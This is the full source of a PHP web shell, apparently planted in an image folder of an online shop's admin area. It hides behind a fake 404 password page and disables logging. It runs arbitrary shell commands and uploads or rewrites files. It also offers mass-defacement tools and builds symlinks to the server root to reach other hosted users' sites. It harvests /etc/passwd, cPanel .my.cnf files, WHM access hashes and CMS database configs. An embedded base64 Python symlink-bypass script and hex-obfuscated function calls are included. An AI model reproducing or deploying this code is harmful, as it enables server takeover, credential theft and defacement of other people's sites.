Uname : Linux V-ShopU01 4.18.0-348.20.1.el8_5.x86_64 #1 SMP Thu Mar 10 20:59:28 UTC 2022 x86_64
Server : Apache/2.4.37 (rocky) OpenSSL/1.1.1k
Whoami : apache
Safe Mode : OFF
DOCUMENT ROOT : /var/www/html/site_shopudiet
Disable Function :
Path : /var/www/html/site_shopudiet/admin/img/

Server IP : Client IP :
Current File : /var/www/html/site_shopudiet/admin/img/1710756325175099122965f811e52c620
header("X-XSS-Protection: 0");
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);

if (version_compare(PHP_VERSION, '5.3.0', '<'))
if (!empty($_SERVER['HTTP_USER_AGENT']))
    $userAgents = array(
        "Yahoo! Slurp",
    if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
        header('HTTP/1.0 404 Not Found');

$password = "101609e5098c67da5647a7f597daf97a";

function login_shell()

		<title>404 Not Found</title>
		<h1>Not Found</h1>

		<p>The requested URL was not found on this server.</p>
		<p>Additionally, a 404 Not Found
			error was encountered while trying to use an ErrorDocument to handle the request.</p>
		<address>Apache Server at <?=$_SERVER['HTTP_HOST'] ?> Port 80</address>
			input {
				margin: 0;
				background-color: #fff;
				border: 1px solid #fff;
				text-align: center;
		<form method="post">
				<input type="password" name="password" autocomplete="off">

if (!isset($_SESSION[md5($_SERVER['HTTP_HOST']) ])) if (empty($password) || (isset($_POST['password']) && (md5($_POST['password']) == $password))) $_SESSION[md5($_SERVER['HTTP_HOST']) ] = true;
else login_shell();

function usergroup()
    if (!function_exists('posix_getegid'))
        $user['name'] = @get_current_user();
        $user['uid'] = @getmyuid();
        $user['gid'] = @getmygid();
        $user['group'] = "?";
        $user['uid'] = @posix_getpwuid(posix_geteuid());
        $user['gid'] = @posix_getgrgid(posix_getegid());
        $user['name'] = $user['uid']['name'];
        $user['uid'] = $user['uid']['uid'];
        $user['group'] = $user['gid']['name'];
        $user['gid'] = $user['gid']['gid'];
    return (object)$user;

function exe($cmd)
    if (function_exists('system'))
        $buff = @ob_get_contents();
        return $buff;
    elseif (function_exists('exec'))
        @exec($cmd, $results);
        $buff = "";
        foreach ($results as $result)
            $buff .= $result;
        return $buff;
    elseif (function_exists('passthru'))
        $buff = @ob_get_contents();
        return $buff;
    elseif (function_exists('shell_exec'))
        $buff = @shell_exec($cmd);
        return $buff;

$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "ON" : "OFF";
$ds = @ini_get("disable_functions");
$open_basedir = @ini_get("Open_Basedir");
$safemode_exec_dir = @ini_get("safe_mode_exec_dir");
$safemode_include_dir = @ini_get("safe_mode_include_dir");
$show_ds = (!empty($ds)) ? "$ds" : "All Functions Is Accessible";
$mysql = (function_exists('mysql_connect')) ? "ON" : "OFF";
$curl = (function_exists('curl_version')) ? "ON" : "OFF";
$wget = (exe('wget --help')) ? "ON" : "OFF";
$perl = (exe('perl --help')) ? "ON" : "OFF";
$ruby = (exe('ruby --help')) ? "ON" : "OFF";
$mssql = (function_exists('mssql_connect')) ? "ON" : "OFF";
$pgsql = (function_exists('pg_connect')) ? "ON" : "OFF";
$python = (exe('python --help')) ? "ON" : "OFF";
$magicquotes = (function_exists('get_magic_quotes_gpc')) ? "ON" : "OFF";
$ssh2 = (function_exists('ssh2_connect')) ? "ON" : "OFF";
$oracle = (function_exists('oci_connect')) ? "ON" : "OFF";

$show_obdir = (!empty($open_basedir)) ? "OFF" : "ON";
$show_exec = (!empty($safemode_exec_dir)) ? "OFF" : "ON";
$show_include = (!empty($safemode_include_dir)) ? "OFF" : "ON";

if (!function_exists('posix_getegid'))
    $user = @get_current_user();
    $uid = @getmyuid();
    $gid = @getmygid();
    $group = "?";
    $uid = @posix_getpwuid(posix_geteuid());
    $gid = @posix_getgrgid(posix_getegid());
    $user = $uid['name'];
    $uid = $uid['uid'];
    $group = $gid['name'];
    $gid = $gid['gid'];

function hdd($s)
    if ($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824) . ' GB';
    elseif ($s >= 1048576) return sprintf('%1.2f', $s / 1048576) . ' MB';
    elseif ($s >= 1024) return sprintf('%1.2f', $s / 1024) . ' KB';
    else return $s . ' B';

$freespace = hdd(disk_free_space("/"));
$total = hdd(disk_total_space("/"));
$used = $total - $freespace;

function path()
    if (isset($_GET['dir']))
        $dir = str_replace("\\", "/", $_GET['dir']);
        $dir = str_replace("\\", "/", getcwd());
    return $dir;
$dir = scandir(path());
foreach ($dir as $folder)
    $dirinfo['path'] = path() . DIRECTORY_SEPARATOR . $folder;
    if (!is_dir($dirinfo['path'])) continue;
    $dirinfo['link'] = ($folder === ".." ? "<a href='?dir=" . dirname(path()) . "'>$folder</a>" : ($folder === "." ? "<a href='?dir=" . path() . "'>$folder</a>" : "<a href='?dir=" . $dirinfo['path'] . "'>$folder</a>"));
    if (function_exists('posix_getpwuid'))
        $dirinfo['owner'] = (object)@posix_getpwuid(fileowner($dirinfo['path']));
        $dirinfo['owner'] = $dirinfo['owner']->name;
        $dirinfo['owner'] = fileowner($dirinfo['path']);
    if (function_exists('posix_getgrgid'))
        $dirinfo['group'] = (object)@posix_getgrgid(filegroup($dirinfo['path']));
        $dirinfo['group'] = $dirinfo['group']->name;
        $dirinfo['group'] = filegroup($dirinfo['path']);

function OS()
    return (substr(strtoupper(PHP_OS) , 0, 3) === "WIN") ? "Windows" : "Linux";

function ambilKata($param, $kata1, $kata2)
    if (strpos($param, $kata1) === false) return false;
    if (strpos($param, $kata2) === false) return false;
    $start = strpos($param, $kata1) + strlen($kata1);
    $end = strpos($param, $kata2, $start);
    $return = substr($param, $start, $end - $start);
    return $return;

function windisk()
    $letters = "";
    $v = explode("\\", path());
    $v = $v[0];
    foreach (range("A", "Z") as $letter)
        $bool = $isdiskette = in_array($letter, array(
        if (!$bool) $bool = is_dir("$letter:\\");
        if ($bool)
            $letters .= "[ <a href='?dir=$letter:\\'" . ($isdiskette ? " onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"" : "") . ">";
            if ($letter . ":" != $v)
                $letters .= $letter;
                $letters .= color(1, 2, $letter);
            $letters .= "</a> ]";
    if (!empty($letters))
        print "Detected Drives $letters<br>";
    if (count($quicklaunch) > 0)
        foreach ($quicklaunch as $item)
            $v = realpath(path() . "..");
            if (empty($v))
                $a = explode(DIRECTORY_SEPARATOR, path());
                unset($a[count($a) - 2]);
                $v = join(DIRECTORY_SEPARATOR, $a);
            print "<a href='" . $item[1] . "'>" . $item[0] . "</a>";

ini_set('display_errors', false);
$Array = ['7068705f756e616d65', '70687076657273696f6e', '6368646972', '676574637764', '707265675f73706c6974', '636f7079', '66696c655f6765745f636f6e74656e7473', '6261736536345f6465636f6465', '69735f646972', '6f625f656e645f636c65616e28293b', '756e6c696e6b', '6d6b646972', '63686d6f64', '7363616e646972', '7374725f7265706c616365', '68746d6c7370656369616c6368617273', '7661725f64756d70', '666f70656e', '667772697465', '66636c6f7365', '64617465', '66696c656d74696d65', '737562737472', '737072696e7466', '66696c657065726d73', '746f756368', '66696c655f657869737473', '72656e616d65', '69735f6172726179', '69735f6f626a656374', '737472706f73', '69735f7772697461626c65', '69735f7265616461626c65', '737472746f74696d65', '66696c6573697a65', '726d646972', '6f625f6765745f636c65616e', '7265616466696c65', '617373657274', ];
$___ = count($Array);
for ($i = 0;$i < $___;$i++)
    $GNJ[] = uhex($Array[$i]);

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if (isset($_GET["d"]))
    $d = uhex($_GET["d"]);
    $d = $GNJ[3]();
$k = $GNJ[4]("/(\\\|\/)/", $d);


				<br />

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							<a class="nav-link ajx" href="?d=<?=hex($d) ?>&<?=hex('mass') ?>">Mass Tools</a>
						<li class="nav-item active">
							<a class="nav-link ajx" href="?d=<?=hex($d) ?>&<?=hex('symlink') ?>">Symlink</a>
						<li class="nav-item active">
							<a class="nav-link ajx" href="?d=<?=hex($d) ?>&<?=hex('config') ?>">Config</a>
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		<div class="u">

			<form method="post" enctype="multipart/form-data">
				<label class="l w"><br>
					<input type="file" name="n[]" onchange="this.form.submit()" multiple class="form-control mr-3">

$o_ = ['<script>$.notify("', '", { className:"1",autoHideDelay: 2000,position:"left bottom" });</script>'];
$f = $o_[0] . 'Success!' . $o_[1];
$g = $o_[0] . 'Failed!' . $o_[1];
if (isset($_FILES["n"]))
    $z = $_FILES["n"]["name"];
    $r = count($z);
    for ($i = 0;$i < $r;$i++)
        if ($GNJ[5]($_FILES["n"]["tmp_name"][$i], $z[$i]))
            echo $f;
            echo $g;


echo "<br>Current Directory : ";
foreach ($k as $m => $l)
    if ($l == '' && $m == 0)
        echo '<a class="ajx" href="?d=2f">/</a>';
    if ($l == '')
    echo '<a class="ajx" href="?d=';
    for ($i = 0;$i <= $m;$i++)
        echo hex($k[$i]);
        if ($i != $m)
            echo '2f';
    echo '">' . $l . '</a>/';
echo ' (' . x("$d/$c") . ')';
print "<br>";
print (OS() === "Windows") ? windisk() : "";
echo "<br><br>";
echo '<a class="btn btn-primary btn-sm ml-3 ajx" href="?d=' . hex($d) . '&n">+NEWFILE+</a>
						  <a class="btn btn-primary btn-sm ajx " href="?d=' . hex($d) . '&l">+NEWDIR+</a>';
echo "<form method='post'><center>
				<font color = 'red'>" . $user . "@" . gethostbyname($_SERVER['HTTP_HOST']) . ": ~ $ </font>&nbsp;
				<input style='border: none; border-bottom: 1px solid #000;' type='text' size='30' height='10' name='cmd'><input style='border: none; border-bottom: 1px solid #000;' type='submit' name='do_cmd' value='>>'>
if ($_POST['do_cmd'])
    echo "<pre>" . exe($_POST['cmd']) . "</pre>";

$a_ = '<table cellspacing="0" cellpadding="7" width="100%">
$b_ = '</th>
								<td class="x">';
$c_ = '</td>
$d_ = '<br />
										<br />
										<input type="submit" class="form-control col-md-3" value="&nbsp;OK&nbsp;" />

if (isset($_GET["s"]))
    echo $a_ . uhex($_GET["s"]) . $b_ . '
									<textarea readonly class = "form-control">' . $GNJ[15]($GNJ[6](uhex($_GET["s"]))) . '</textarea>
									<br />
									<br />
									<input onclick="location.href=\'?d=' . $_GET["d"] . '&e=' . $_GET["s"] . '\'" type="submit" class="form-control col-md-3" value="&nbsp;EDIT&nbsp;" />
								' . $c_;
elseif (isset($_GET["y"]))
    echo $a_ . 'REQUEST' . $b_ . '
									<form method="post">
										<input class="form-control md-3" type="text" name="1" autocomplete="off" />&nbsp;&nbsp;
										<input class="form-control md-3" type="text" name="2" autocomplete="off" />
										' . $d_ . '
									<br />
									<textarea readonly class = "form-control">';

    if (isset($_POST["2"]))
        echo $GNJ[15](dre($_POST["1"], $_POST["2"]));

    echo '</textarea>
								' . $c_;
elseif (isset($_GET["e"]))
    echo $a_ . uhex($_GET["e"]) . $b_ . '
									<form method="post">
										<textarea name="e" class="form-control">' . $GNJ[15]($GNJ[6](uhex($_GET["e"]))) . '</textarea>
										<br />
										<br />
										<span class="w">BASE64</span> :
										<center><select id="b64" name="b64" class = "form-control col-md-3">
											<option value="0">NO</option>
											<option value="1">YES</option>
										' . $d_ . '
								' . $c_ . '
						$("#b64").change(function() {
							if($("#b64 option:selected").val() == 0) {
								var X = $("textarea").val();
								var Z = atob(X);
							else {
								var N = $("textarea").val();
								var I = btoa(N);
    if (isset($_POST["e"]))
        if ($_POST["b64"] == "1")
            $ex = $GNJ[7]($_POST["e"]);
            $ex = $_POST["e"];
        $fp = $GNJ[17](uhex($_GET["e"]) , 'w');
        if ($GNJ[18]($fp, $ex))
elseif (isset($_GET["x"]))
    if ($GNJ[26](uhex($_GET["x"])))
elseif (isset($_GET["t"]))
    echo $a_ . uhex($_GET["t"]) . $b_ . '
									<form action="" method="post">
										<input name="t" class="form-control col-md-3" autocomplete="off" type="text" value="' . $GNJ[20]("Y-m-d H:i", $GNJ[21](uhex($_GET["t"]))) . '">
										' . $d_ . '
								' . $c_;
    if (!empty($_POST["t"]))
        $p = $GNJ[33]($_POST["t"]);
        if ($p)
            if (!$GNJ[25](uhex($_GET["t"]) , $p, $p))
elseif (isset($_GET["k"]))
    echo $a_ . uhex($_GET["k"]) . $b_ . '
									<form action="" method="post">
										<input name="b" autocomplete="off" class="form-control col-md-3" type="text" value="' . $GNJ[22]($GNJ[23]('%o', $GNJ[24](uhex($_GET["k"]))) , -4) . '">
										' . $d_ . '
								' . $c_;
    if (!empty($_POST["b"]))
        $x = $_POST["b"];
        $t = 0;
        for ($i = strlen($x) - 1;$i >= 0;--$i) $t += (int)$x[$i] * pow(8, (strlen($x) - $i - 1));
        if (!$GNJ[12](uhex($_GET["k"]) , $t))
elseif (isset($_GET["l"]))
    echo $a_ . '+DIR' . $b_ . '
									<form action="" method="post">
										<input name="l" autocomplete="off" class="form-control col-md-3" type="text" value="">
										' . $d_ . '
								' . $c_;
    if (isset($_POST["l"]))
        if (!$GNJ[11]($_POST["l"]))
elseif (isset($_GET["q"]))
    if ($GNJ[10](__FILE__))
        header("Location: " . basename($_SERVER['PHP_SELF']) . "");
        echo $g;
elseif (isset($_GET[hex('info') ]))
    echo '<hr>SYSTEM INFORMATION<center>
						<textarea class = "form-control" readonly>
			Server 					: ' . $_SERVER['HTTP_HOST'] . '
			Server IP 				: ' . $_SERVER['SERVER_ADDR'] . ' Your IP : ' . $_SERVER['REMOTE_ADDR'] . '
			Kernel Version 			: ' . php_uname() . '
			Software 					: ' . $_SERVER['SERVER_SOFTWARE'] . '
			Storage Space 			: ' . $used . "/" . $total . "(Free : " . $freespace . ")" . '
			User / Group 				: ' . $user . ' (' . $uid . ') | ' . $group . ' (' . $gid . ') 
			Time On Server 			: ' . date("d M Y h:i:s a") . '
			Disable Functions 			: ' . $show_ds . '
			Safe Mode 				: ' . $sm . '
			PHP VERSION 				: ' . phpversion() . ' On ' . php_sapi_name() . '

	Open_Basedir : ' . $show_obdir . ' | Safe Mode Exec Dir : ' . $show_exec . ' | Safe Mode Include Dir : ' . $show_include . '
	MySQL : ' . $mysql . ' | MSSQL : ' . $mssql . ' | PostgreSQL : ' . $pgsql . ' | Perl : ' . $perl . ' | Python : ' . $python . ' | Ruby : ' . $ruby . ' |  WGET : ' . $wget . ' | cURL : ' . $curl . ' | Magic Quotes : ' . $magicquotes . ' | SSH2 : ' . $ssh2 . ' | Oracle : ' . $oracle . ' 
elseif (isset($_GET[hex('mass') ]))
    echo "<hr>
						<h2><center>Mass Tools Shell</center></h2>
						<form method = 'POST'>
						<div class = 'row clearfix'>
						<div class = 'col-md-4'>
						<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex('mass_tool') . "' style='width: 250px;' height='10'><center>Mass Deface / Delete Files</center></a>
						<div class = 'col-md-4'>
						<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex('mass_user') . "' style='width: 250px;' height='10'><center>Mass User Changer</center></a>
						<div class = 'col-md-4'>
						<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex('mass_title') . "' style='width: 250px;' height='10'><center>Mass Title Changer</center></a>
elseif (isset($_GET[hex('symlink') ]))
    echo "<hr><br>";
    echo "<center>
						<h2> Symlink Shell </h2> <br><br>
						<form method = 'POST'>
						<div class = 'row clearfix'>
						<div class = 'col-md-4'>
						<input type = 'submit' name = 'symlink' class = 'form-control' value = 'Symlink' style='width: 250px;' height='10'>
						<div class = 'col-md-4'>
						<input type = 'submit' name = 'symlink2' class = 'form-control' value = 'Symlink 2' style='width: 250px;' height='10'>
						<div class = 'col-md-4'>
						<input type = 'submit' name = 'symlink_py' class = 'form-control' value = 'Symlink Python' style='width: 250px;' height='10'>
    if (isset($_POST['symlink']))

        echo "<br><br><center><h2>Symlink Shell</h2></center><br><br><center><div class=content>";

        @mkdir('sym', 0777);
        $htaccess = "Options all n DirectoryIndex Sux.html n AddType text/plain .php n AddHandler server-parsed .php n  AddType text/plain .html n AddHandler txt .html n Require None n Satisfy Any";
        $write = @fopen('sym/.htaccess', 'w');
        fwrite($write, $htaccess);
        @symlink('/', 'sym/root');
        $filelocation = basename(__FILE__);
        $read_named_conf = @file('/etc/named.conf');
        if (!$read_named_conf)
            echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
            echo "<br><br><div class='tmp'><table border='1' bordercolor='lime' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
            foreach ($read_named_conf as $subject)
                if (eregi('zone', $subject))
                    preg_match_all('#zone "(.*)"#', $subject, $string);
                    if (strlen(trim($string[1][0])) > 2)
                        $UID = posix_getpwuid(@fileowner('/etc/valiases/' . $string[1][0]));
                        $name = $UID['name'];
                        @symlink('/', 'sym/root');
                        $name = $string[1][0];
                        $iran = '.ir';
                        $israel = '.il';
                        $indo = '.id';
                        $sg12 = '.sg';
                        $edu = '.edu';
                        $gov = '.gov';
                        $gose = '.go';
                        $gober = '.gob';
                        $mil1 = '.mil';
                        $mil2 = '.mi';
                        $malay = '.my';
                        $china = '.cn';
                        $japan = '.jp';
                        $austr = '.au';
                        $porn = '.xxx';
                        $as = '.uk';
                        $calfn = '.ca';

                        if (eregi("$iran", $string[1][0]) or eregi("$israel", $string[1][0]) or eregi("$indo", $string[1][0]) or eregi("$sg12", $string[1][0]) or eregi("$edu", $string[1][0]) or eregi("$gov", $string[1][0]) or eregi("$gose", $string[1][0]) or eregi("$gober", $string[1][0]) or eregi("$mil1", $string[1][0]) or eregi("$mil2", $string[1][0]) or eregi("$malay", $string[1][0]) or eregi("$china", $string[1][0]) or eregi("$japan", $string[1][0]) or eregi("$austr", $string[1][0]) or eregi("$porn", $string[1][0]) or eregi("$as", $string[1][0]) or eregi("$calfn", $string[1][0]))
                            $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>" . $string[1][0] . '</div>';
                        echo "

			<div class='dom'><a target='_blank' href=http://www." . $string[1][0] . '/>' . $name . ' </a> </div>

			' . $UID['name'] . "

			<a href='sym/root/home/" . $UID['name'] . "/public_html' target='_blank'>Symlink </a>

			</tr></div> ";

        echo "</center></table>";
    elseif (isset($_POST['symlink2']))

        $dir = path();
        $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
        $d0mains = @file("/etc/named.conf");
        if ($d0mains)
            @mkdir("Exc_sym", 0777);
            @exe("ln -s / root");
            $file3 = 'Options Indexes FollowSymLinks
DirectoryIndex Exc.htm
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any';
            $fp3 = fopen('.htaccess', 'w');
            $fw3 = fwrite($fp3, $file3);
            echo "
<table align=center border=1 style='width:60%;border-color:#333333;'>
<td align=center><font size=2>S. No.</font></td>
<td align=center><font size=2>Domains</font></td>
<td align=center><font size=2>Users</font></td>
<td align=center><font size=2>Symlink</font></td>
            $dcount = 1;
            foreach ($d0mains as $d0main)
                if (eregi("zone", $d0main))
                    preg_match_all('#zone "(.*)"#', $d0main, $domains);
                    if (strlen(trim($domains[1][0])) > 2)
                        $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
                        echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
<td align=left><a href=http://www." . $domains[1][0] . "/><font class=txt>" . $domains[1][0] . "</font></a></td>
<td>" . $user['name'] . "</td>
<td><a href='$full/Exc_sym/root/home/" . $user['name'] . "/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
            echo "</table>";
            $TEST = @file('/etc/passwd');
            if ($TEST)
                @mkdir("Exc_sym", 0777);
                exe("ln -s / root");
                $file3 = 'Options Indexes FollowSymLinks
DirectoryIndex Exc.htm
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any';
                $fp3 = fopen('.htaccess', 'w');
                $fw3 = fwrite($fp3, $file3);
                echo "
 <table align=center border=1><tr>
 <td align=center><font size=3>S. No.</font></td>
 <td align=center><font size=3>Users</font></td>
 <td align=center><font size=3>Symlink</font></td></tr>";
                $dcount = 1;
                $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
                while (!feof($file))
                    $s = fgets($file);
                    $matches = array();
                    $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
                    $matches = str_replace("home/", "", $matches[1]);
                    if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue;
                    echo "<tr><td align=center><font size=2>" . $dcount . "</td>
 <td align=center><font class=txt>" . $matches . "</td>";
                    echo "<td align=center><font class=txt><a href=$full/Exc_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
                echo "</table>";
                if ($os != "Windows")
                    @mkdir("Exc_sym", 0777);
                    @exe("ln -s / root");
                    $file3 = '
 Options Indexes FollowSymLinks
DirectoryIndex Exc.htm
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any
                    $fp3 = fopen('.htaccess', 'w');
                    $fw3 = fwrite($fp3, $file3);
                    echo "
 <h2><center>Symlink2 Shell</center></h2>
 <table align=center border=1><tr>
 <td align=center><font size=3>ID</font></td>
 <td align=center><font size=3>Users</font></td>
 <td align=center><font size=3>Symlink</font></td></tr>";
                    $temp = "";
                    $val1 = 0;
                    $val2 = 1000;
                    for (;$val1 <= $val2;$val1++)
                        $uid = @posix_getpwuid($val1);
                        if ($uid) $temp .= join(':', $uid) . "\n";
                    echo '<br/>';
                    $temp = trim($temp);
                    $file5 = fopen("test.txt", "w");
                    fputs($file5, $temp);
                    $dcount = 1;
                    $file = fopen("test.txt", "r") or exit("Unable to open file!");
                    while (!feof($file))
                        $s = fgets($file);
                        $matches = array();
                        $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
                        $matches = str_replace("home/", "", $matches[1]);
                        if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue;
                        echo "<tr><td align=center><font size=2>" . $dcount . "</td>
 <td align=center><font class=txt>" . $matches . "</td>";
                        echo "<td align=center><font class=txt><a href=$full/Exc_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
                    echo "</table></center>";
                else echo "<center><font size=3>Cannot create Symlink</font></center>";
    elseif (isset($_POST['symlink_py']))
        $sym_dir = mkdir('ia_sympy', 0755);
        $file_sym = "sym.py";
        $sym_script = "Iy8qUHl0aG9uDQoNCmltcG9ydCB0aW1lDQppbXBvcnQgb3MNCmltcG9ydCBzeXMNCmltcG9ydCByZQ0KDQpvcy5zeXN0ZW0oImNvbG9yIEMiKQ0KDQpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIg0KZiA9ICJBbGwgUHJvY2Vzc2VzIERvbmUhXG5TeW1saW5rIEJ5cGFzc2VkIFN1Y2Nlc3NmdWxseSFcbiINCnByaW50ICJcbiINCnByaW50ICJ+Iio2MA0KcHJpbnQgIlN5bWxpbmsgQnlwYXNzIDIwMTQgYnkgTWluZGxlc3MgSW5qZWN0b3IgIg0KcHJpbnQgIiAgICAgICAgICAgICAgU3BlY2lhbCBHcmVldHogdG8gOiBQYWsgQ3liZXIgU2t1bGx6Ig0KcHJpbnQgIn4iKjYwDQoNCm9zLm1ha2VkaXJzKCdicnVkdWxzeW1weScpDQpvcy5jaGRpcignYnJ1ZHVsc3ltcHknKQ0KDQpzdXNyPVtdDQpzaXRleD1bXQ0Kb3Muc3lzdGVtKCJsbiAtcyAvIGJydWR1bC50eHQiKQ0KDQpoID0gIk9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rc1xuRGlyZWN0b3J5SW5kZXggYnJ1ZHVsLnBodG1sXG5BZGRUeXBlIHR4dCAucGhwXG5BZGRIYW5kbGVyIHR4dCAucGhwIg0KbSA9IG9wZW4oIi5odGFjY2VzcyIsIncrIikNCm0ud3JpdGUoaCkNCm0uY2xvc2UoKQ0KcHJpbnQgaHRhDQoNCnNmID0gIjxodG1sPjx0aXRsZT5TeW1saW5rIFB5dGhvbjwvdGl0bGU+PGNlbnRlcj48Zm9udCBjb2xvcj13aGl0ZSBzaXplPTU+U3ltbGluayBCeXBhc3MgMjAxNzxicj48Zm9udCBzaXplPTQ+TWFkZSBCeSBNaW5kbGVzcyBJbmplY3RvciA8YnI+UmVjb2RlZCBCeSBDb243ZXh0PC9mb250PjwvZm9udD48YnI+PGZvbnQgY29sb3I9d2hpdGUgc2l6ZT0zPjx0YWJsZT4iDQoNCm8gPSBvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKQ0Kbz1vLnJlYWQoKQ0KbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykNCg0KZm9yIHh1c3IgaW4gbzoNCgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykNCglzdXNyLmFwcGVuZCh4dXNyKQ0KcHJpbnQgIi0iKjMwDQp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQ0KDQpmb3IgeHhzaXRlIGluIHhzaXRlOg0KCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikNCglzaXRleC5hcHBlbmQoeHhzaXRlKQ0KcHJpbnQgZg0KcGF0aD1vcy5nZXRjd2QoKQ0KaWYgIi9wdWJsaWNfaHRtbC8iIGluIHBhdGg6DQoJcGF0aD0iL3B1YmxpY19odG1sLyINCmVsc2U6DQoJcGF0aCA9ICIvaHRtbC8iDQpjb3VudGVyPTENCmlwcz1vcGVuKCJicnVkdWwucGh0bWwiLCJ3IikNCmlwcy53cml0ZShzZikNCg0KZm9yIGZ1c3IgaW4gc3VzcjoNCglmb3IgZnNpdGUgaW4gc2l0ZXg6DQoJCWZ1PWZ1c3JbMDo1XQ0KCQlzPWZzaXRlWzA6NV0NCgkJaWYgZnU9PXM6DQoJCQlpcHMud3JpdGUoIjxib2R5IGJnY29sb3I9YmxhY2s+PHRyPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7Y29sb3I6d2hpdGU7PiVzPC90ZD48dGQgc3R5bGU9Zm9udC1mYW1pbHk6Y2FsaWJyaTtmb250LXdlaWdodDpib2xkO2NvbG9yOnJlZDs+JXM8L3RkPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7PjxhIGhyZWY9YnJ1ZHVsLnR4dC9ob21lLyVzJXMgdGFyZ2V0PV9ibGFuayA+JXM8L2E+PC90ZD4iJShjb3VudGVyLGZ1c3IsZnVzcixwYXRoLGZzaXRlKSkNCgkJCWNvdW50ZXI9Y291bnRlcisx";
        $sym = fopen($file_sym, "w");
        fwrite($sym, base64_decode($sym_script));
        chmod($file_sym, 0755);
        $jancok = exe("python sym.py");
        echo "<br><center>Done ... <a href='ia_sympy/brudulsympy/' target='_blank'>Klik Here</a>";
elseif (isset($_GET[hex('config') ]))
    $dir = path();
    if ($_POST)
        $passwd = $_POST['passwd'];
        mkdir("Exc_config", 0777);
        $isi_htc = "Options all\nRequire None\nSatisfy Any";
        $htc = fopen("Exc_config/.htaccess", "w");
        fwrite($htc, $isi_htc);
        preg_match_all('/(.*?):x:/', $passwd, $user_config);
        foreach ($user_config[1] as $user_Exc)
            $user_config_dir = "/home/$user_Exc/public_html/";
            if (is_readable($user_config_dir))
                $grab_config = array(
                    "/home/$user_Exc/.my.cnf" => "cpanel",
                    "/home/$user_Exc/.accesshash" => "WHM-accesshash",
                    "/home/$user_Exc/public_html/bw-configs/config.ini" => "BosWeb",
                    "/home/$user_Exc/public_html/config/koneksi.php" => "Lokomedia",
                    "/home/$user_Exc/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
                    "/home/$user_Exc/public_html/clientarea/configuration.php" => "WHMCS",
                    "/home/$user_Exc/public_html/whm/configuration.php" => "WHMCS",
                    "/home/$user_Exc/public_html/whmcs/configuration.php" => "WHMCS",
                    "/home/$user_Exc/public_html/forum/config.php" => "phpBB",
                    "/home/$user_Exc/public_html/sites/default/settings.php" => "Drupal",
                    "/home/$user_Exc/public_html/config/settings.inc.php" => "PrestaShop",
                    "/home/$user_Exc/public_html/app/etc/local.xml" => "Magento",
                    "/home/$user_Exc/public_html/joomla/configuration.php" => "Joomla",
                    "/home/$user_Exc/public_html/configuration.php" => "Joomla",
                    "/home/$user_Exc/public_html/wp/wp-config.php" => "WordPress",
                    "/home/$user_Exc/public_html/wordpress/wp-config.php" => "WordPress",
                    "/home/$user_Exc/public_html/wp-config.php" => "WordPress",
                    "/home/$user_Exc/public_html/admin/config.php" => "OpenCart",
                    "/home/$user_Exc/public_html/slconfig.php" => "Sitelok",
                    "/home/$user_Exc/public_html/application/config/database.php" => "Ellislab",
                    "/home1/$user_Exc/.my.cnf" => "cpanel",
                    "/home1/$user_Exc/.accesshash" => "WHM-accesshash",
                    "/home1/$user_Exc/public_html/bw-configs/config.ini" => "BosWeb",
                    "/home1/$user_Exc/public_html/config/koneksi.php" => "Lokomedia",
                    "/home1/$user_Exc/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
                    "/home1/$user_Exc/public_html/clientarea/configuration.php" => "WHMCS",
                    "/home1/$user_Exc/public_html/whm/configuration.php" => "WHMCS",
                    "/home1/$user_Exc/public_html/whmcs/configuration.php" => "WHMCS",
                    "/home1/$user_Exc/public_html/forum/config.php" => "phpBB",
